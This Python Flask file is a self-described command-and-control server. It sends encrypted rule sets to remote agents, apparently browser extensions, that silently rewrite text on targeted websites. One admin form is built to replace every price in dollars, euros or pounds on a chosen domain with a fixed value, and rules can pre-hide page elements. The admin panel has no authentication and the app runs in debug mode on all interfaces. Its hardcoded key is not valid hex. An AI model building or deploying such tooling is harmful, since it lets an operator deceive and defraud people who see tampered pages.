# File: c2_lexicon_server.py
# Coder >_< : The C2 Lexicon, now fortified with Admin UI, SSE, and AES-GCM encryption. Edicts travel in utmost secrecy.

from flask import Flask, jsonify, request, render_template, redirect, url_for, flash, Response
import json
import os
import uuid # For generating unique rule IDs
import datetime
import time # For SSE sleep
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
import base64 # To send binary ciphertext over JSON/HTTP

# --- Flask App Initialization ---
app = Flask(__name__)
# !!! IMPORTANT: REPLACE with a strong, persistent secret key, ideally from an environment variable !!!
app.secret_key = os.environ.get('FLASK_SECRET_KEY', 'YOUR_VERY_STRONG_AND_UNIQUE_FLASK_SECRET_KEY_HERE_v5')
app.config['SESSION_COOKIE_SECURE'] = True 
app.config['SESSION_COOKIE_HTTPONLY'] = True
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'

# --- Global Constants ---
EDICTS_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'botc_text_edicts.json')

# !!! CRITICAL SECURITY: REPLACE WITH YOUR OWN SECURE, RANDOMLY GENERATED 32-BYTE (64 HEX CHARS) KEY !!!
# This key MUST be absolutely identical in background_lexicon_conduit.js
AES_KEY_HEX = "y8IffM584cpBVs9DTHFOPelvBpBNL3wq74x6169851mDaFxLlAdtVZLe0Klh3zDw" 
try:
    AES_KEY = bytes.fromhex(AES_KEY_HEX)
    if len(AES_KEY) != 32:
        raise ValueError("AES_KEY must be 32 bytes (64 hex characters) for AES-256.")
except ValueError as e:
    print(f"[CRITICAL ERROR] Invalid AES_KEY_HEX: {e}. Please provide a valid 64-character hex string for a 32-byte key.")
    # In a real app, you might exit or use a default (less secure) development key with a warning.
    # Forcing a valid key structure here:
    AES_KEY = os.urandom(32) # Fallback to a random key if config is wrong, but this won't match client!
    print(f"[WARNING] Using a RANDOMLY GENERATED FALLBACK AES KEY due to invalid AES_KEY_HEX. Client will not be able to decrypt unless it has this specific random key: {AES_KEY.hex()}")


# --- SSE Edict Change Detection ---
# This simple mtime check is for demonstration.
# For robust multi-worker Gunicorn, use a proper file watching library (e.g., watchdog)
# or a signaling mechanism (e.g., Redis pub/sub, database flag).
last_known_edict_mtime_for_sse = 0 

def get_edicts_file_mtime():
    try:
        if os.path.exists(EDICTS_FILE_PATH):
            return os.path.getmtime(EDICTS_FILE_PATH)
    except OSError as e:
        print(f"[WARNING] Could not get modification time for edicts file: {e}")
    return 0

# Initialize on script load for SSE comparison
last_known_edict_mtime_for_sse = get_edicts_file_mtime()


# --- Helper Functions for Edict Management ---
def load_edicts():
    """Loads edicts from the JSON file."""
    try:
        if not os.path.exists(EDICTS_FILE_PATH):
            print(f"[INFO] Edicts file not found at {EDICTS_FILE_PATH}. Returning empty list.")
            return [] 
        with open(EDICTS_FILE_PATH, 'r', encoding='utf-8') as f:
            edicts_data = json.load(f)
        for rule in edicts_data: # Ensure defaults for robust template rendering
            rule.setdefault('id', generate_rule_id())
            rule.setdefault('description', '')
            rule.setdefault('url_patterns', [])
            rule.setdefault('replacements', [])
            rule.setdefault('is_active', True)
            rule.setdefault('persistent_mutation_observer', False)
            rule.setdefault('pre_hide_selectors', [])
        return edicts_data
    except (FileNotFoundError, json.JSONDecodeError) as e:
        print(f"[ERROR] Failed to load or parse edicts file {EDICTS_FILE_PATH}: {e}. Returning empty list.")
        return []
    except Exception as e:
        print(f"[ERROR] Unexpected error loading edicts from {EDICTS_FILE_PATH}: {e}. Returning empty list.")
        return []

def save_edicts(edicts_data):
    """Saves edicts to the JSON file and updates the global mtime tracker for SSE."""
    global last_known_edict_mtime_for_sse 
    try:
        with open(EDICTS_FILE_PATH, 'w', encoding='utf-8') as f:
            json.dump(edicts_data, f, indent=2)
        current_mtime = get_edicts_file_mtime()
        if current_mtime != 0: # If get_edicts_file_mtime was successful
            last_known_edict_mtime_for_sse = current_mtime
        print(f"[INFO] Edicts successfully saved to {EDICTS_FILE_PATH}. SSE mtime trigger updated to: {last_known_edict_mtime_for_sse}")
        return True
    except IOError as e:
        print(f"[ERROR] Failed to save edicts file to {EDICTS_FILE_PATH}: {e}")
        return False
    except Exception as e:
        print(f"[ERROR] Unexpected error saving edicts to {EDICTS_FILE_PATH}: {e}")
        return False

def generate_rule_id():
    return "edict_" + str(uuid.uuid4())[:8]

# --- Encryption Function ---
def encrypt_payload(payload_string, key):
    iv = os.urandom(12)  # GCM recommended IV size is 12 bytes (96 bits)
    cipher = Cipher(algorithms.AES(key), modes.GCM(iv), backend=default_backend())
    encryptor = cipher.encryptor()
    # encryptor.authenticate_additional_data(b"optional_aad") # If you use AAD
    ciphertext = encryptor.update(payload_string.encode('utf-8')) + encryptor.finalize()
    # Prepend IV to ciphertext, then Base64 encode
    return base64.b64encode(iv + encryptor.tag + ciphertext).decode('utf-8') # IV (12) + TAG (16, GCM default) + Ciphertext

# --- Agent API Endpoint (Serves ENCRYPTED Edicts) ---
@app.route('/botc_lexicon/edicts', methods=['GET'])
def get_text_edicts():
    edicts_list = load_edicts()
    try:
        edicts_json_string = json.dumps(edicts_list)
        encrypted_edicts_payload = encrypt_payload(edicts_json_string, AES_KEY)
        print(f"[BoTC Lexicon API] Served {len(edicts_list)} Edicts (encrypted) to an agent.")
        return jsonify({"payload": encrypted_edicts_payload}) 
    except Exception as e:
        print(f"[ERROR] Failed to encrypt and serve edicts: {e}")
        return jsonify({"error": "Failed to prepare edicts payload"}), 500

# --- Server-Sent Events (SSE) Endpoint for Edict Update Notifications ---
@app.route('/botc_lexicon/edict_events')
def edict_events():
    def event_stream():
        global last_known_edict_mtime_for_sse # Use the global tracker
        client_last_seen_mtime = last_known_edict_mtime_for_sse # Send current state initially
        
        print(f"[SSE Stream] Client connected. Initial server mtime for this client: {client_last_seen_mtime}")
        # Send an initial event immediately so client knows connection is live
        # yield f"event: connected\ndata: {int(time.time())}\n\n" # Optional: connection confirmation event
        
        try:
            while True:
                # Check the global 'last_known_edict_mtime_for_sse' which is updated by save_edicts
                if last_known_edict_mtime_for_sse > client_last_seen_mtime:
                    print(f"[SSE Stream] Edicts file change detected (server mtime: {last_known_edict_mtime_for_sse}). Sending update event.")
                    yield f"event: edicts_updated\ndata: {int(last_known_edict_mtime_for_sse)}\n\n"
                    client_last_seen_mtime = last_known_edict_mtime_for_sse
                time.sleep(3)  # Check for signal change every 3 seconds
        except GeneratorExit:
            print("[SSE Stream] Client disconnected.")
        except Exception as e:
            print(f"[SSE Stream] Error in event stream: {e}")
            
    headers = {
        'Content-Type': 'text/event-stream',
        'Cache-Control': 'no-cache',
        'Connection': 'keep-alive',
        'X-Accel-Buffering': 'no' # Important for Nginx if it's proxying
    }
    return Response(event_stream(), mimetype='text/event-stream', headers=headers)

# --- Admin UI Routes ---
@app.route('/admin')
def admin_redirect_route():
    return redirect(url_for('admin_view_rules'))

@app.route('/admin/rules', methods=['GET'])
def admin_view_rules():
    edicts = load_edicts()
    return render_template('admin_rules.html', 
                           edicts=edicts, 
                           active_tab='advanced_rules', 
                           current_year=datetime.datetime.utcnow().year)

@app.route('/admin/add_rule', methods=['POST'])
def admin_add_rule():
    edicts = load_edicts()
    url_patterns_str = request.form.get('url_patterns_str', '')
    replacements_str = request.form.get('replacements_str', '')
    pre_hide_selectors_str = request.form.get('pre_hide_selectors_str', '')
    parsed_replacements = []
    if replacements_str:
        pairs = replacements_str.split(';')
        for pair_str in pairs:
            parts = [p.strip() for p in pair_str.split('|')]
            if not parts[0]: continue
            if len(parts) == 2:
                parsed_replacements.append({"find": parts[0], "replace_with": parts[1]})
            elif len(parts) == 3:
                parsed_replacements.append({"find_regex": parts[0], "replace_with": parts[1], "regex_flags": parts[2]})
            else:
                 flash(f'Warning: Malformed replacement entry "{pair_str}" skipped.', 'warning')
    new_rule = {
        "id": generate_rule_id(), "description": request.form.get('description', ''),
        "url_patterns": [p.strip() for p in url_patterns_str.split(',') if p.strip()],
        "replacements": parsed_replacements, "is_active": request.form.get('is_active') == 'on',
        "persistent_mutation_observer": request.form.get('persistent_mutation_observer') == 'on',
        "pre_hide_selectors": [p.strip() for p in pre_hide_selectors_str.split(',') if p.strip()]
    }
    if not new_rule["url_patterns"] or not new_rule["replacements"]:
        flash('URL Patterns and at least one valid Replacement are required for advanced edict.', 'error')
    else:
        edicts.append(new_rule)
        if save_edicts(edicts): flash('Advanced Edict added successfully!', 'success')
        else: flash('Failed to save advanced edict.', 'error')
    return redirect(url_for('admin_view_rules'))

@app.route('/admin/currency_rules', methods=['GET', 'POST'])
def admin_currency_rules():
    if request.method == 'POST':
        edicts = load_edicts()
        domain = request.form.get('domain', '').strip()
        currency_symbol_raw = request.form.get('currency_symbol', '$').strip()
        new_value_str = request.form.get('new_value_str', '').strip()
        description = request.form.get('description', '').strip()
        pre_hide_selector = request.form.get('currency_pre_hide_selector','').strip()
        if not domain or not new_value_str:
            flash('Domain and New Fixed Value are required.', 'error')
            return redirect(url_for('admin_currency_rules'))
        if not description: description = f'Dynamic {currency_symbol_raw} override to "{new_value_str}" on {domain}'
        find_regex = ""
        if currency_symbol_raw == '$': find_regex = "\\$\\s*\\d{1,3}(?:,\\d{3})*(?:\\.\\d{2})?"
        elif currency_symbol_raw == '€': find_regex = "€\\s*\\d{1,3}(?:[,.]\\d{3})*(?:\\.\\d{2})?"
        elif currency_symbol_raw == '£': find_regex = "£\\s*\\d{1,3}(?:,\\d{3})*(?:\\.\\d{2})?"
        else:
            flash(f"Unsupported currency symbol: {currency_symbol_raw}", 'error')
            return redirect(url_for('admin_currency_rules'))
        new_rule = {
            "id": generate_rule_id(), "description": description,
            "url_patterns": [f"*://*.{domain}/*", f"*://{domain}/*"],
            "replacements": [{"find_regex": find_regex, "regex_flags": "g", "replace_with": new_value_str}],
            "is_active": True, "persistent_mutation_observer": True,
            "pre_hide_selectors": [pre_hide_selector] if pre_hide_selector else []
        }
        edicts.append(new_rule)
        if save_edicts(edicts): flash(f'Currency rule for {currency_symbol_raw} on {domain} added!', 'success')
        else: flash('Failed to save currency edict.', 'error')
        return redirect(url_for('admin_view_rules'))
    return render_template('admin_currency_rules.html', active_tab='currency_rules', current_year=datetime.datetime.utcnow().year)

@app.route('/admin/delete_rule/<rule_id>', methods=['POST'])
def admin_delete_rule(rule_id):
    edicts = load_edicts()
    original_length = len(edicts)
    edicts = [rule for rule in edicts if rule.get('id') != rule_id]
    if len(edicts) < original_length:
        if save_edicts(edicts): flash(f'Edict {rule_id} deleted.', 'success')
        else: flash('Error saving after deletion.', 'error')
    else: flash(f'Edict {rule_id} not found.', 'warning')
    return redirect(url_for('admin_view_rules'))

@app.route('/admin/toggle_rule/<rule_id>', methods=['POST'])
def admin_toggle_rule(rule_id):
    edicts = load_edicts()
    rule_found = False
    for rule in edicts:
        if rule.get('id') == rule_id:
            rule['is_active'] = not rule.get('is_active', False)
            rule_found = True
            flash(f"Edict {rule_id} status toggled to {'Active' if rule['is_active'] else 'Inactive'}.", 'success')
            break
    if not rule_found: flash(f'Edict {rule_id} not found.', 'warning')
    if rule_found and not save_edicts(edicts): flash(f'Error saving toggle for Edict {rule_id}.', 'error')
    return redirect(url_for('admin_view_rules'))

if __name__ == '__main__':
    if not os.path.exists('templates'): os.makedirs('templates')
    if not os.path.exists('static'): os.makedirs('static')
    if not os.path.exists(EDICTS_FILE_PATH):
        save_edicts([]) 
        print(f"[INFO] Created empty edicts file at {EDICTS_FILE_PATH}")
    
    last_known_edict_mtime_for_sse = get_edicts_file_mtime() # Initialize mtime tracker
    
    print("[BoTC Lexicon Admin + SSE] Awakening. Ensure 'templates' and 'static' folders exist.")
    print(f"Admin UI available at http://127.0.0.1:6661/admin")
    print(f"Agent API for edicts at http://127.0.0.1:6661/botc_lexicon/edicts")
    print(f"SSE Edict events at http://127.0.0.1:6661/botc_lexicon/edict_events")
    app.run(host='0.0.0.0', port=6661, debug=True, threaded=True)